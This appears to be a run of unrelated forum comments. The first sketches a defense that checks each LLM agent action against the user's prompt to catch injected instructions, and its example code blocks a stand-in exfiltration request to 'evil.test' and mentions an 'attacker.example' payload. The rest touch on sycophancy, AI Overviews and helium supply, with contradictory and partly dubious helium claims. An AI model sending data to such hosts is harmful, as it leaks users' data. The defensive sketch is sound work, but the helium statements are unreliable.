The blog mentions checking each agent action (say the agent was planning to send a malicious HTTP request) against the user prompt for coherence. The attack vector still exists, but this should make the trivial versions of instruction injection harder.
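A minimal sketch of that gating idea, with a keyword heuristic standing in for the judge model so it runs offline (the function names and the heuristic are my own invention, not from the blog; a real system would ask a separate LLM "does this action serve the user's request?"):

```python
from urllib.parse import urlparse

def judge(user_prompt: str, action: str) -> bool:
    # Stand-in for an LLM judge: flag HTTP requests to hosts that never
    # appear in the user's prompt. A real implementation would replace
    # this with a model call scoring prompt/action coherence.
    host = urlparse(action.split(" ", 1)[-1]).netloc
    return host in user_prompt

def gate_action(user_prompt: str, action: str) -> str:
    # Check network-touching actions against the original user request
    # before executing them; pass everything else through.
    if action.startswith(("GET ", "POST ")):
        if not judge(user_prompt, action):
            return "BLOCKED"
    return "ALLOWED"

print(gate_action("summarize https://example.com/post",
                  "GET https://example.com/post"))   # ALLOWED
print(gate_action("summarize https://example.com/post",
                  "POST https://evil.test/exfil"))   # BLOCKED
```

The point is only the shape of the defense: an injected instruction can still phrase its exfiltration to look coherent with the prompt, but a naive "send everything to attacker.example" payload gets caught.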
If it were just "noisy", you could compensate with scale. It's worse than that.
"Human preference" is incredibly fucking entangled, and we have no way to disentangle it and get rid of all the unwanted confounders. A lot of the recent "extreme LLM sycophancy" cases are downstream of that.
I assume the high volume of search traffic forces Google to use a low-quality model for AI Overviews. Frontier Google models (e.g. Gemini 2.5 Pro) are on par with, if not better than, the leading models from other companies.
Helium is released by alpha decay (hence unlikely to run out in the near future) and is also obtainable from natural gas. That said, it is still non-renewable (in the sense that once the radioactive decays happen, no more helium is released) and has quite volatile prices for some reason.
For those who don't know, the helium we use for party balloons is mostly accumulated alpha particles trapped in petroleum reserves. When that helium is released it floats into the upper atmosphere and escapes into space. All other methods of helium acquisition are extremely costly and inefficient.
This means that within the next couple hundred years, give or take, humanity will run out of helium cheap enough to use for piddly things like MRIs and particle accelerators. It will essentially become one of the most valuable resources on the planet, mostly extracted from volcanic gases.